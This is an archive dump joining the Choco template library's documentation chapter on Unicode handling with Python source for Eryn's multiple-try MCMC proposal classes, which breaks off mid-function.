/Choco-1.0.5.tar.gz/Choco-1.0.5/doc/build/unicode.rst | .. _unicode_toplevel:
===================
The Unicode Chapter
===================
The Python language supports two ways of representing what we
know as "strings", i.e. series of characters. In Python 2, the
two types are ``string`` and ``unicode``, and in Python 3 they are
``bytes`` and ``string``. A key aspect of the Python 2 ``string`` and
Python 3 ``bytes`` types are that they contain no information
regarding what **encoding** the data is stored in. For this
reason they were commonly referred to as **byte strings** on
Python 2, and Python 3 makes this name more explicit. The
origins of this come from Python's background of being developed
before the Unicode standard was even available, back when
strings were C-style strings and were just that, a series of
bytes. Strings that had only values below 128 just happened to
be **ASCII** strings and were printable on the console, whereas
strings with values above 128 would produce all kinds of
graphical characters and bells.
Contrast the "byte-string" type with the "unicode/string" type.
Objects of this latter type are created whenever you say something like
``u"hello world"`` (or in Python 3, just ``"hello world"``). In this
case, Python represents each character in the string internally
using multiple bytes per character (something similar to
UTF-16). What's important is that when using the
``unicode``/``string`` type to store strings, Python knows the
data's encoding; it's in its own internal format. Whereas when
using the ``string``/``bytes`` type, it does not.
When Python 2 attempts to treat a byte-string as a string, which
means it's attempting to compare/parse its characters, to coerce
it into another encoding, or to decode it to a unicode object,
it has to guess what the encoding is. In this case, it will
pretty much always guess the encoding as ``ascii``... and if the
byte-string contains bytes above value 128, you'll get an error.
Python 3 eliminates much of this confusion by just raising an
error unconditionally if a byte-string is used in a
character-aware context.
There is one operation that Python *can* do with a non-ASCII
byte-string, and it's a great source of confusion: it can dump the
byte-string straight out to a stream or a file, with nary a care
what the encoding is. To Python, this is pretty much like
dumping any other kind of binary data (like an image) to a
stream somewhere. In Python 2, it is common to see programs that
embed all kinds of international characters and encodings into
plain byte-strings (i.e. using ``"hello world"`` style literals)
can fly right through their run, sending reams of strings out to
wherever they are going, and the programmer, seeing the same
output as was expressed in the input, is now under the illusion
that his or her program is Unicode-compliant. In fact, their
program has no unicode awareness whatsoever, and similarly has
no ability to interact with libraries that *are* unicode aware.
Python 3 makes this much less likely by defaulting to unicode as
the storage format for strings.
The "pass through encoded data" scheme is what template
languages like Cheetah and earlier versions of Myghty do by
default. Choco as of version 0.2 also supports this mode of
operation when using Python 2, using the ``disable_unicode=True``
flag. However, when using Choco in its default mode of
unicode-aware, it requires explicitness when dealing with
non-ASCII encodings. Additionally, if you ever need to handle
unicode strings and other kinds of encoding conversions more
intelligently, the usage of raw byte-strings quickly becomes a
nightmare, since you are sending the Python interpreter
collections of bytes for which it can make no intelligent
decisions with regards to encoding. In Python 3 Choco only allows
usage of native, unicode strings.
In normal Choco operation, all parsed template constructs and
output streams are handled internally as Python ``unicode``
objects. It's only at the point of :meth:`~.Template.render` that this unicode
stream may be rendered into whatever the desired output encoding
is. The implication here is that the template developer must
ensure that :ref:`the encoding of all non-ASCII templates is explicit
<set_template_file_encoding>` (still required in Python 3),
that :ref:`all non-ASCII-encoded expressions are in one way or another
converted to unicode <handling_non_ascii_expressions>`
(not much of a burden in Python 3), and that :ref:`the output stream of the
template is handled as a unicode stream being encoded to some
encoding <defining_output_encoding>` (still required in Python 3).
.. _set_template_file_encoding:
Specifying the Encoding of a Template File
==========================================
This is the most basic encoding-related setting, and it is
equivalent to Python's "magic encoding comment", as described in
`pep-0263 <http://www.python.org/dev/peps/pep-0263/>`_. Any
template that contains non-ASCII characters requires that this
comment be present so that Choco can decode to unicode (and also
make usage of Python's AST parsing services). Choco's lexer will
use this encoding in order to convert the template source into a
``unicode`` object before continuing its parsing:
.. sourcecode:: choco
## -*- coding: utf-8 -*-
Alors vous imaginez ma surprise, au lever du jour, quand
une drôle de petite voix m’a réveillé. Elle disait:
« S’il vous plaît… dessine-moi un mouton! »
For the picky, the regular expression used is derived from that
of the above mentioned pep:
.. sourcecode:: python
#.*coding[:=]\s*([-\w.]+).*\n
The lexer will convert to unicode in all cases, so that if any
characters exist in the template that are outside of the
specified encoding (or the default of ``ascii``), the error will
be immediate.
As an alternative, the template encoding can be specified
programmatically to either :class:`.Template` or :class:`.TemplateLookup` via
the ``input_encoding`` parameter:
.. sourcecode:: python
t = TemplateLookup(directories=['./'], input_encoding='utf-8')
The above will assume all located templates specify ``utf-8``
encoding, unless the template itself contains its own magic
encoding comment, which takes precedence.
.. _handling_non_ascii_expressions:
Handling Expressions
====================
The next area that encoding comes into play is in expression
constructs. By default, Choco's treatment of an expression like
this:
.. sourcecode:: choco
${"hello world"}
looks something like this:
.. sourcecode:: python
context.write(unicode("hello world"))
In Python 3, it's just:
.. sourcecode:: python
context.write(str("hello world"))
That is, **the output of all expressions is run through the
``unicode`` built-in**. This is the default setting, and can be
modified to expect various encodings. The ``unicode`` step serves
both the purpose of rendering non-string expressions into
strings (such as integers or objects which contain ``__str__()``
methods), and to ensure that the final output stream is
constructed as a unicode object. The main implication of this is
that **any raw byte-strings that contain an encoding other than
ASCII must first be decoded to a Python unicode object**. It
means you can't say this in Python 2:
.. sourcecode:: choco
${"voix m’a réveillé."} ## error in Python 2!
You must instead say this:
.. sourcecode:: choco
${u"voix m’a réveillé."} ## OK !
Similarly, if you are reading data from a file that is streaming
bytes, or returning data from some object that is returning a
Python byte-string containing a non-ASCII encoding, you have to
explicitly decode to unicode first, such as:
.. sourcecode:: choco
${call_my_object().decode('utf-8')}
Note that filehandles acquired by ``open()`` in Python 3 default
to returning "text", that is the decoding is done for you. See
Python 3's documentation for the ``open()`` built-in for details on
this.
If you want a certain encoding applied to *all* expressions,
override the ``unicode`` builtin with the ``decode`` built-in at the
:class:`.Template` or :class:`.TemplateLookup` level:
.. sourcecode:: python
t = Template(templatetext, default_filters=['decode.utf8'])
Note that the built-in ``decode`` object is slower than the
``unicode`` function, since unlike ``unicode`` it's not a Python
built-in, and it also checks the type of the incoming data to
determine if string conversion is needed first.
The ``default_filters`` argument can be used to entirely customize
the filtering process of expressions. This argument is described
in :ref:`filtering_default_filters`.
.. _defining_output_encoding:
Defining Output Encoding
========================
Now that we have a template which produces a pure unicode output
stream, all the hard work is done. We can take the output and do
anything with it.
As stated in the :doc:`"Usage" chapter <usage>`, both :class:`.Template` and
:class:`.TemplateLookup` accept ``output_encoding`` and ``encoding_errors``
parameters which can be used to encode the output in any Python
supported codec:
.. sourcecode:: python
from choco.template import Template
from choco.lookup import TemplateLookup
mylookup = TemplateLookup(directories=['/docs'], output_encoding='utf-8', encoding_errors='replace')
mytemplate = mylookup.get_template("foo.txt")
print(mytemplate.render())
:meth:`~.Template.render` will return a ``bytes`` object in Python 3 if an output
encoding is specified. By default it performs no encoding and
returns a native string.
:meth:`~.Template.render_unicode` will return the template output as a Python
``unicode`` object (or ``str`` in Python 3):
.. sourcecode:: python
print(mytemplate.render_unicode())
The above method disregards the output encoding keyword argument;
you can encode yourself by saying:
.. sourcecode:: python
print(mytemplate.render_unicode().encode('utf-8', 'replace'))
Buffer Selection
----------------
Choco does play some games with the style of buffering used
internally, to maximize performance. Since the buffer is by far
the most heavily used object in a render operation, it's
important!
When calling :meth:`~.Template.render` on a template that does not specify any
output encoding (i.e. it's ``ascii``), Python's ``cStringIO`` module,
which cannot handle encoding of non-ASCII ``unicode`` objects
(even though it can send raw byte-strings through), is used for
buffering. Otherwise, a custom Choco class called
``FastEncodingBuffer`` is used, which essentially is a super
dumbed-down version of ``StringIO`` that gathers all strings into
a list and uses ``u''.join(elements)`` to produce the final output
-- it's markedly faster than ``StringIO``.
.. _unicode_disabled:
Saying to Heck with It: Disabling the Usage of Unicode Entirely
===============================================================
Some segments of Choco's userbase choose to make no usage of
Unicode whatsoever, and instead would prefer the "pass through"
approach; all string expressions in their templates return
encoded byte-strings, and they would like these strings to pass
right through. The only advantage to this approach is that
templates need not use ``u""`` for literal strings; there's an
arguable speed improvement as well since raw byte-strings
generally perform slightly faster than unicode objects in
Python. For these users, assuming they're sticking with Python
2, they can hit the ``disable_unicode=True`` flag as so:
.. sourcecode:: python
# -*- coding:utf-8 -*-
from choco.template import Template
t = Template("drôle de petite voix m’a réveillé.", disable_unicode=True, input_encoding='utf-8')
print(t.code)
The ``disable_unicode`` mode is strictly a Python 2 thing. It is
not supported at all in Python 3.
The generated module source code will contain elements like
these:
.. sourcecode:: python
# -*- coding:utf-8 -*-
# ...more generated code ...
def render_body(context,**pageargs):
context.caller_stack.push_frame()
try:
__M_locals = dict(pageargs=pageargs)
# SOURCE LINE 1
context.write('dr\xc3\xb4le de petite voix m\xe2\x80\x99a r\xc3\xa9veill\xc3\xa9.')
return ''
finally:
context.caller_stack.pop_frame()
Where above that the string literal used within :meth:`.Context.write`
is a regular byte-string.
When ``disable_unicode=True`` is turned on, the ``default_filters``
argument which normally defaults to ``["unicode"]`` now defaults
to ``["str"]`` instead. Setting ``default_filters`` to the empty list
``[]`` can remove the overhead of the ``str`` call. Also, in this
mode you **cannot** safely call :meth:`~.Template.render_unicode` -- you'll get
unicode/decode errors.
The ``h`` filter (HTML escape) uses a less performant pure Python
escape function in non-unicode mode. This is because
MarkupSafe only supports Python unicode objects for non-ASCII
strings.
.. versionchanged:: 0.3.4
In prior versions, it used ``cgi.escape()``, which has been replaced
with a function that also escapes single quotes.
Rules for using ``disable_unicode=True``
----------------------------------------
* Don't use this mode unless you really, really want to and you
absolutely understand what you're doing.
* Don't use this option just because you don't want to learn to
use Unicode properly; we aren't supporting user issues in this
mode of operation. We will however offer generous help for the
vast majority of users who stick to the Unicode program.
* Python 3 is unicode by default, and the flag is not available
when running on Python 3.
| PypiClean |
/Eryn-1.1.4.tar.gz/Eryn-1.1.4/eryn/moves/multipletry.py | from multiprocessing.sharedctypes import Value
import numpy as np
import warnings
from copy import deepcopy
from abc import ABC
# from scipy.special import logsumexp
try:
import cupy as xp
gpu_available = True
except (ModuleNotFoundError, ImportError):
import numpy as xp
gpu_available = False
from .rj import ReversibleJumpMove
from ..prior import ProbDistContainer
from ..utils.utility import groups_from_inds
# Public API of this module (the original "___" was a typo for "__all__"
# and had no effect; MultipleTryMoveRJ is also defined/exported here).
__all__ = ["MultipleTryMove", "MultipleTryMoveRJ"]
def logsumexp(a, axis=None, xp=None):
    """Compute ``log(sum(exp(a)))`` along ``axis`` in a numerically stable way.

    Local substitute for ``scipy.special.logsumexp`` so that ``cupy`` arrays
    can be used as well (note the commented-out scipy import above).

    Args:
        a (np.ndarray): Input array.
        axis (int, optional): Axis over which the sum is taken.
            (default: ``None``, i.e. reduce over all elements)
        xp (obj, optional): Array module to use (``numpy`` or ``cupy``).
            (default: ``None``, which maps to ``numpy``)

    Returns:
        np.ndarray or scalar: ``log(sum(exp(a)))`` reduced over ``axis``.

    """
    if xp is None:
        xp = np

    # Subtract the per-slice maximum before exponentiating to avoid overflow.
    # ``keepdims=True`` makes the subtraction broadcast correctly for any
    # ``axis`` (the original ``max[:, None]`` only worked for 2-D input with
    # ``axis=-1`` and raised for 1-D arrays or ``axis=None``). Also avoids
    # shadowing the ``max`` builtin.
    a_max = xp.max(a, axis=axis, keepdims=True)
    sum_of_exp = xp.exp(a - a_max).sum(axis=axis)
    return xp.squeeze(a_max, axis=axis) + xp.log(sum_of_exp)
class MultipleTryMove(ABC):
    """Generate multiple proposal tries.

    This class should be inherited by another proposal class
    with the ``@classmethods`` overwritten. See :class:`eryn.moves.MTDistGenMove`
    and :class:`MTDistGenRJ` for examples.

    Args:
        num_try (int, optional): Number of tries. (default: 1)
        independent (bool, optional): Set to ``True`` if the proposal is independent of the current points.
            (default: ``False``).
        symmetric (bool, optional): Set to ``True`` if the proposal is symmetric.
            (default: ``False``).
        rj (bool, optional): Set to ``True`` if this is a nested reversible jump proposal.
            (default: ``False``).
        xp (obj, optional): Array module to use (``numpy`` or ``cupy``).
            (default: ``None``, which maps to ``numpy``)
        **kwargs (dict, optional): for compatibility with other proposals.

    Raises:
        ValueError: Input issues.

    """

    def __init__(
        self, num_try=1, independent=False, symmetric=False, rj=False, xp=None, **kwargs
    ):
        self.num_try = num_try
        self.independent = independent
        self.symmetric = symmetric
        self.rj = rj

        if self.rj:
            # nested rj proposals are never treated as symmetric or independent
            if self.symmetric or self.independent:
                raise ValueError(
                    "If rj==True, symmetric and independent must both be False."
                )

        # default to numpy when no array module is provided
        if xp is None:
            xp = np
        self.xp = xp

    @classmethod
    def special_like_func(self, generated_coords, *args, inds_leaves_rj=None, **kwargs):
        """Calculate the Likelihood for sampled points.

        Args:
            generated_coords (np.ndarray): Generated coordinates with shape ``(number of independent walkers, num_try)``.
            *args (tuple, optional): additional arguments passed by overwriting the
                ``get_proposal`` function and passing ``args_like`` keyword argument.
            inds_leaves_rj (np.ndarray): Index into each individual walker giving the
                leaf index associated with this proposal. Should only be used if ``self.rj is True``. (default: ``None``)
            **kwargs (tuple, optional): additional keyword arguments passed by overwriting the
                ``get_proposal`` function and passing ``kwargs_like`` keyword argument.

        Returns:
            np.ndarray: Likelihood values with shape ``(generated_coords.shape[0], num_try).``

        Raises:
            NotImplementedError: Function not included.

        """
        raise NotImplementedError

    @classmethod
    def special_prior_func(self, generated_coords, *args, **kwargs):
        """Calculate the Prior for sampled points.

        Args:
            generated_coords (np.ndarray): Generated coordinates with shape ``(number of independent walkers, num_try)``.
            *args (tuple, optional): additional arguments passed by overwriting the
                ``get_proposal`` function and passing ``args_prior`` keyword argument.
            **kwargs (tuple, optional): additional keyword arguments passed by overwriting the
                ``get_proposal`` function and passing ``kwargs_prior`` keyword argument.

        Returns:
            np.ndarray: Prior values with shape ``(generated_coords.shape[0], num_try).``

        Raises:
            NotImplementedError: Function not included.

        """
        raise NotImplementedError

    # NOTE(review): this classmethod signature has no ``cls``/``self`` slot and
    # places ``size`` before ``*args``, which conflicts with how it is called
    # below (``size`` passed by keyword after positional ``*args_generate``).
    # Subclasses override it with a working signature, so it is kept as-is here.
    @classmethod
    def special_generate_func(
        coords, random, size=1, *args, fill_tuple=None, fill_values=None, **kwargs
    ):
        """Generate samples and calculate the logpdf of their proposal function.

        Args:
            coords (np.ndarray): Current coordinates of walkers.
            random (obj): Random generator.
            *args (tuple, optional): additional arguments passed by overwriting the
                ``get_proposal`` function and passing ``args_generate`` keyword argument.
            size (int, optional): Number of tries to generate.
            fill_tuple (tuple, optional): Length 2 tuple with the indexing of which values to fill
                when generating. Can be used for auxiliary proposals or reverse RJ proposals.
                First index is the index into walkers and the second index is
                the index into the number of tries. (default: ``None``)
            fill_values (np.ndarray): values to fill associated with ``fill_tuple``. Should
                have size ``(len(fill_tuple[0]), ndim)``. (default: ``None``).
            **kwargs (tuple, optional): additional keyword arguments passed by overwriting the
                ``get_proposal`` function and passing ``kwargs_generate`` keyword argument.

        Returns:
            tuple: (generated points, logpdf of generated points).

        Raises:
            NotImplementedError: Function not included.

        """
        raise NotImplementedError

    @classmethod
    def special_generate_logpdf(self, coords):
        """Get logpdf of generated coordinates.

        Args:
            coords (np.ndarray): Current coordinates of walkers.

        Returns:
            np.ndarray: logpdf of generated points.

        Raises:
            NotImplementedError: Function not included.

        """
        raise NotImplementedError

    def get_mt_log_posterior(self, ll, lp, betas=None):
        """Calculate the log of the posterior for all tries.

        Args:
            ll (np.ndarray): Log Likelihood values with shape ``(nwalkers, num_tries)``.
            lp (np.ndarray): Log Prior values with shape ``(nwalkers, num_tries)``.
            betas (np.ndarray, optional): Inverse temperatures to include in log Posterior computation.
                (default: ``None``)

        Returns:
            np.ndarray: Log of the (tempered) Posterior with shape ``(nwalkers, num_tries)``.

        """
        if betas is None:
            # no tempering: posterior = ll + lp
            ll_temp = ll.copy()
        else:
            assert isinstance(betas, self.xp.ndarray)
            if ll.ndim > 1:
                # add a trailing axis so betas broadcasts over the tries dimension
                betas_tmp = self.xp.expand_dims(betas, ll.ndim - 1)
            else:
                betas_tmp = betas
            ll_temp = betas_tmp * ll

        return ll_temp + lp

    def readout_adjustment(self, out_vals, all_vals_prop, aux_all_vals):
        """Read out values from the proposal.

        Allows the user to read out any values from the proposal that may be
        needed elsewhere. This function must be overwritten to be used.

        Args:
            out_vals (list): ``[logP_out, ll_out, lp_out, log_proposal_pdf_out, log_sum_weights]``.
            all_vals_prop (list): ``[logP, ll, lp, log_proposal_pdf, log_sum_weights]``.
            aux_all_vals (list): ``[aux_logP, aux_ll, aux_lp, aux_log_proposal_pdf, aux_log_sum_weights]``.

        """
        pass

    def get_mt_proposal(
        self,
        coords,
        random,
        args_generate=(),
        kwargs_generate={},
        args_like=(),
        kwargs_like={},
        args_prior=(),
        kwargs_prior={},
        betas=None,
        ll_in=None,
        lp_in=None,
        inds_leaves_rj=None,
        inds_reverse_rj=None,
    ):
        """Make a multiple-try proposal

        Here, ``nwalkers`` refers to all independent walkers which generally
        will mean ``nwalkers * ntemps`` in terms of the rest of the sampler.

        Args:
            coords (np.ndarray): Current coordinates of walkers.
            random (obj): Random generator.
            args_generate (tuple, optional): Additional ``*args`` to pass to generate function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``()``)
            kwargs_generate (dict, optional): Additional ``**kwargs`` to pass to generate function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``{}``)
            args_like (tuple, optional): Additional ``*args`` to pass to Likelihood function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``()``)
            kwargs_like (dict, optional): Additional ``**kwargs`` to pass to Likelihood function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``{}``)
            args_prior (tuple, optional): Additional ``*args`` to pass to Prior function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``()``)
            kwargs_prior (dict, optional): Additional ``**kwargs`` to pass to Prior function.
                Must overwrite ``get_proposal`` function to use these.
                (default: ``{}``)
            betas (np.ndarray, optional): Inverse temperatures passed to the proposal with shape ``(nwalkers,)``.
            ll_in (np.ndarray, optional): Log Likelihood values coming in for current coordinates. Must be provided
                if ``self.rj is True``. For all proposed removals, this value must be the Likelihood with the binary
                removed so all proposals are pretending to add a binary.
                Useful if ``self.independent is True``. (default: ``None``)
            lp_in (np.ndarray, optional): Log Prior values coming in for current coordinates. Must be provided
                if ``self.rj is True``. For all proposed removals, this value must be the Prior with the binary
                removed so all proposals are pretending to add a binary.
                Useful if ``self.independent is True``. (default: ``None``)
            inds_leaves_rj (np.ndarray, optional): Array giving the leaf index of each incoming walker.
                Must be provided if ``self.rj is True``. (default: ``None``)
            inds_reverse_rj (np.ndarray, optional): Array giving the walker index for which proposals are
                reverse proposals removing a leaf.
                Must be provided if ``self.rj is True``. (default: ``None``)

        Returns:
            tuple: (generated points, factors).

        Raises:
            ValueError: Inputs are incorrect.

        """
        # check if rj and make sure we have all the information in that case
        if self.rj:
            try:
                assert ll_in is not None and lp_in is not None
                assert inds_leaves_rj is not None and inds_reverse_rj is not None
            except AssertionError:
                raise ValueError(
                    "If using rj, must provide ll_in, lp_in, inds_leaves_rj, and inds_reverse_rj."
                )

            # if using reversible jump, fill first spot with values that are proposed to remove
            fill_tuple = (inds_reverse_rj, np.zeros_like(inds_reverse_rj))
            fill_values = coords[inds_reverse_rj]

        else:
            fill_tuple = None
            fill_values = None

        # generate new points and get log of the proposal probability
        generated_points, log_proposal_pdf = self.special_generate_func(
            coords,
            random,
            *args_generate,
            size=self.num_try,
            fill_values=fill_values,
            fill_tuple=fill_tuple,
            **kwargs_generate
        )

        # compute the Likelihood functions
        ll = self.special_like_func(
            generated_points, *args_like, inds_leaves_rj=inds_leaves_rj, **kwargs_like
        )

        # check for nans; replace with a huge negative value so they are
        # effectively never selected rather than corrupting the weights
        if self.xp.any(self.xp.isnan(ll)):
            warnings.warn("Getting nans for ll in multiple try.")
            ll[self.xp.isnan(ll)] = -1e300

        # compute the Prior functions
        lp = self.special_prior_func(
            generated_points, *args_prior, inds_leaves_rj=inds_leaves_rj, **kwargs_prior
        )

        # if rj, make proposal distribution for all other leaves the prior value
        # this will properly cancel the prior with the proposal for leaves that already exist
        if self.rj:
            log_proposal_pdf += lp_in[:, None]

        # get posterior distribution including tempering
        logP = self.get_mt_log_posterior(ll, lp, betas=betas)

        # set weights based on if symmetric (proposal pdf cancels when symmetric)
        if self.symmetric:
            log_importance_weights = logP
        else:
            log_importance_weights = logP - log_proposal_pdf

        # get the sum of weights
        log_sum_weights = logsumexp(log_importance_weights, axis=-1, xp=self.xp)

        # probs = wi / sum(wi)
        log_of_probs = log_importance_weights - log_sum_weights[:, None]

        # probabilities to choose try
        probs = self.xp.exp(log_of_probs)

        # draw one try per walker via inverse-CDF sampling on the weights
        inds_keep = (
            probs.cumsum(1) > self.xp.random.rand(probs.shape[0])[:, None]
        ).argmax(1)

        # tuple of index arrays of which try chosen per walker
        inds_tuple = (self.xp.arange(len(inds_keep)), inds_keep)

        if self.rj:
            # removals were filled into slot 0 above;
            # this just ensures the cancellation of logP and aux_logP outside of proposal
            inds_tuple[1][inds_reverse_rj] = 0

        # get chosen prior, Likelihood, posterior information
        lp_out = lp[inds_tuple]
        ll_out = ll[inds_tuple]
        logP_out = logP[inds_tuple]

        # store this information for access outside of multiple try part
        self.mt_lp = lp_out
        self.mt_ll = ll_out

        # choose points and get the log of the proposal for storage
        generated_points_out = generated_points[inds_tuple].copy()  # theta^j
        log_proposal_pdf_out = log_proposal_pdf[inds_tuple]

        # prepare auxiliary information based on if it is nested rj, independent, or not
        if self.independent:
            # if independent, all the tries can be repeated for the auxiliary draws
            aux_ll = ll.copy()
            aux_lp = lp.copy()

            # sub in the generation pdf for the current coordinates
            aux_log_proposal_pdf_sub = self.special_generate_logpdf(coords)

            # set sub ll based on if it is provided
            if ll_in is None:
                # NOTE(review): ``special_generate_like`` is not defined in this
                # class — subclasses using the independent path must provide it
                # (or always pass ``ll_in``). TODO: confirm intended API.
                aux_ll_sub = self.special_generate_like(coords)
            else:
                assert ll_in.shape[0] == coords.shape[0]
                aux_ll_sub = ll_in

            # set sub lp based on if it is provided
            if lp_in is None:
                # NOTE(review): ``special_generate_prior`` is likewise not
                # defined in this class — see note above.
                aux_lp_sub = self.special_generate_prior(coords)
            else:
                assert lp_in.shape[0] == coords.shape[0]
                aux_lp_sub = lp_in

            # sub in this information from the current coordinates
            aux_ll[inds_tuple] = aux_ll_sub
            aux_lp[inds_tuple] = aux_lp_sub

            # get auxiliary posterior
            aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)

            # get aux_log_proposal_pdf information
            aux_log_proposal_pdf = log_proposal_pdf.copy()
            aux_log_proposal_pdf[inds_tuple] = aux_log_proposal_pdf_sub

            # set auxiliary weights
            aux_log_importance_weights = aux_logP - aux_log_proposal_pdf

        elif self.rj:
            # in rj, set aux_ll and aux_lp to be repeats of the model with one less leaf
            aux_ll = np.repeat(ll_in[:, None], self.num_try, axis=-1)
            aux_lp = np.repeat(lp_in[:, None], self.num_try, axis=-1)

            # probability is the prior for the existing points
            aux_log_proposal_pdf = aux_lp.copy()

            # get log posterior
            aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)

            # get importance weights
            aux_log_importance_weights = aux_logP - aux_log_proposal_pdf

        else:
            # generate auxiliary points based on chosen new points
            aux_generated_points, aux_log_proposal_pdf = self.special_generate_func(
                generated_points_out,
                random,
                *args_generate,
                size=self.num_try,
                fill_tuple=inds_tuple,
                fill_values=generated_points_out,
                **kwargs_generate
            )

            # get ll, lp, and logP
            aux_ll = self.special_like_func(
                aux_generated_points, *args_like, **kwargs_like
            )
            aux_lp = self.special_prior_func(aux_generated_points)
            aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)

            # set auxiliary weights
            if not self.symmetric:
                # BUG FIX: the original referenced ``aux_log_proposal_pdf_sub``,
                # which is only defined in the ``independent`` branch above and
                # raised NameError here; the auxiliary proposal pdf computed in
                # this branch is ``aux_log_proposal_pdf``.
                aux_log_importance_weights = aux_logP - aux_log_proposal_pdf
            else:
                aux_log_importance_weights = aux_logP

        # chosen output old Posteriors
        aux_logP_out = aux_logP[inds_tuple]

        # get sum of log weights
        aux_log_sum_weights = logsumexp(aux_log_importance_weights, axis=-1, xp=self.xp)

        aux_log_proposal_pdf_out = aux_log_proposal_pdf[inds_tuple]

        # this is setup to make clear with the math:
        # the +/- aux_log_proposal_pdf_out (and log_proposal_pdf_out) terms
        # deliberately cancel; setting up factors this way means the
        # final lnpdiff will effectively be the ratio of the sums
        # of the weights.
        # IMPORTANT: logP_out must be subtracted against log_sum_weights before anything else due to -1e300s.
        factors = (
            (aux_logP_out - aux_log_sum_weights)
            - aux_log_proposal_pdf_out
            + aux_log_proposal_pdf_out
        ) - ((logP_out - log_sum_weights) - log_proposal_pdf_out + log_proposal_pdf_out)

        if self.rj:
            # adjust all information for reverse rj proposals
            factors[inds_reverse_rj] *= -1
            self.mt_ll[inds_reverse_rj] = ll_in[inds_reverse_rj]
            self.mt_lp[inds_reverse_rj] = lp_in[inds_reverse_rj]

        # store output information
        self.aux_logP_out = aux_logP_out
        self.logP_out = logP_out
        self.aux_ll = aux_ll
        self.aux_lp = aux_lp
        self.log_sum_weights = log_sum_weights
        self.aux_log_sum_weights = aux_log_sum_weights

        if self.rj:
            self.inds_reverse_rj = inds_reverse_rj
            self.inds_forward_rj = np.delete(
                np.arange(coords.shape[0]), inds_reverse_rj
            )

        # prepare to readout any information the user would like in readout_adjustment
        out_vals = [logP_out, ll_out, lp_out, log_proposal_pdf_out, log_sum_weights]
        all_vals_prop = [logP, ll, lp, log_proposal_pdf, log_sum_weights]
        aux_all_vals = [
            aux_logP,
            aux_ll,
            aux_lp,
            aux_log_proposal_pdf,
            aux_log_sum_weights,
        ]
        self.readout_adjustment(out_vals, all_vals_prop, aux_all_vals)

        return (
            generated_points_out,
            factors,
        )

    def get_proposal(self, branches_coords, random, branches_inds=None, **kwargs):
        """Get proposal

        Args:
            branches_coords (dict): Keys are ``branch_names`` and values are
                np.ndarray[ntemps, nwalkers, nleaves_max, ndim] representing
                coordinates for walkers.
            random (object): Current random state object.
            branches_inds (dict, optional): Keys are ``branch_names`` and values are
                np.ndarray[ntemps, nwalkers, nleaves_max] representing which
                leaves are currently being used. (default: ``None``)
            **kwargs (ignored): This is added for compatibility. It is ignored in this function.

        Returns:
            tuple: (Proposed coordinates, factors) -> (dict, np.ndarray)

        Raises:
            ValueError: Input issues.

        """
        # multiple try is only made for one branch here
        if len(list(branches_coords.keys())) > 1:
            raise ValueError("Can only propose change to one model at a time with MT.")

        # get main key
        key_in = list(branches_coords.keys())[0]
        self.key_in = key_in

        # get inds information; default to all leaves used
        if branches_inds is None:
            branches_inds = {}
            branches_inds[key_in] = np.ones(
                branches_coords[key_in].shape[:-1], dtype=bool
            )

        # Make sure for base proposals that there is only one leaf
        if np.any(branches_inds[key_in].sum(axis=-1) > 1):
            raise ValueError

        ntemps, nwalkers, _, _ = branches_coords[key_in].shape

        # get temperature information, flattened to one value per active leaf
        # NOTE: ``self.temperature_control`` / ``self.current_state`` are
        # provided by the sampler machinery this class is mixed into.
        betas_here = np.repeat(
            self.temperature_control.betas[:, None],
            np.prod(branches_coords[key_in].shape[1:-1]),
        ).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]

        # previous Likelihoods in case proposal is independent
        ll_here = np.repeat(
            self.current_state.log_like[:, :, None],
            branches_coords[key_in].shape[2],
            axis=-1,
        ).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]

        # previous Priors in case proposal is independent
        lp_here = np.repeat(
            self.current_state.log_prior[:, :, None],
            branches_coords[key_in].shape[2],
            axis=-1,
        ).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]

        # get mt proposal
        generated_points, factors = self.get_mt_proposal(
            branches_coords[key_in][branches_inds[key_in]],
            random,
            betas=betas_here,
            ll_in=ll_here,
            lp_in=lp_here,
        )

        # store this information for access outside
        self.mt_ll = self.mt_ll.reshape(ntemps, nwalkers)
        self.mt_lp = self.mt_lp.reshape(ntemps, nwalkers)

        return (
            {key_in: generated_points.reshape(ntemps, nwalkers, 1, -1)},
            factors.reshape(ntemps, nwalkers),
        )
class MultipleTryMoveRJ(MultipleTryMove):
    """Multiple-try proposal for nested reversible jump moves.

    Builds on :class:`MultipleTryMove` by setting up the leaf add/remove
    bookkeeping before delegating to :meth:`MultipleTryMove.get_mt_proposal`.
    Relies on ``self.temperature_control``, ``self.current_state``,
    ``self.current_model``, and ``self.get_model_change_proposal`` being
    provided by the sampler machinery this class is mixed into.
    """

    def get_proposal(
        self, branches_coords, branches_inds, nleaves_min_all, nleaves_max_all, random, **kwargs
    ):
        """Make a proposal

        Args:
            branches_coords (dict): Keys are ``branch_names``. Values are
                np.ndarray[ntemps, nwalkers, nleaves_max, ndim]. These are the current
                coordinates for all the walkers.
            branches_inds (dict): Keys are ``branch_names``. Values are
                np.ndarray[ntemps, nwalkers, nleaves_max]. These are the boolean
                arrays marking which leaves are currently used within each walker.
            nleaves_min_all (dict): Minimum values of leaf count for each model. Must have
                the same keys as ``branches_coords``.
            nleaves_max_all (dict): Maximum values of leaf count for each model. Must have
                the same keys as ``branches_coords``.
            random (object): Current random state of the sampler.
            **kwargs (ignored): For modularity.

        Returns:
            tuple: Tuple containing proposal information.
                First entry is the new coordinates as a dictionary with keys
                as ``branch_names`` and values as
                np.ndarray[ntemps, nwalkers, nleaves_max, ndim] containing
                proposed coordinates. Second entry is the new ``inds`` array with
                boolean values flipped for added or removed sources. Third entry
                is the factors associated with the
                proposal necessary for detailed balance. This is effectively
                any term in the detailed balance fraction. +log of factors if
                in the numerator. -log of factors if in the denominator.

        Raises:
            ValueError: Input issues.

        """
        # multiple try is only made for one branch here
        if len(list(branches_coords.keys())) > 1:
            raise ValueError("Can only propose change to one model at a time with MT.")

        # get main key
        key_in = list(branches_coords.keys())[0]
        self.key_in = key_in

        if branches_inds is None:
            raise ValueError("In MT RJ proposal, branches_inds cannot be None.")

        ntemps, nwalkers, nleaves_max, ndim = branches_coords[key_in].shape

        # get temperature information, one beta per flattened walker
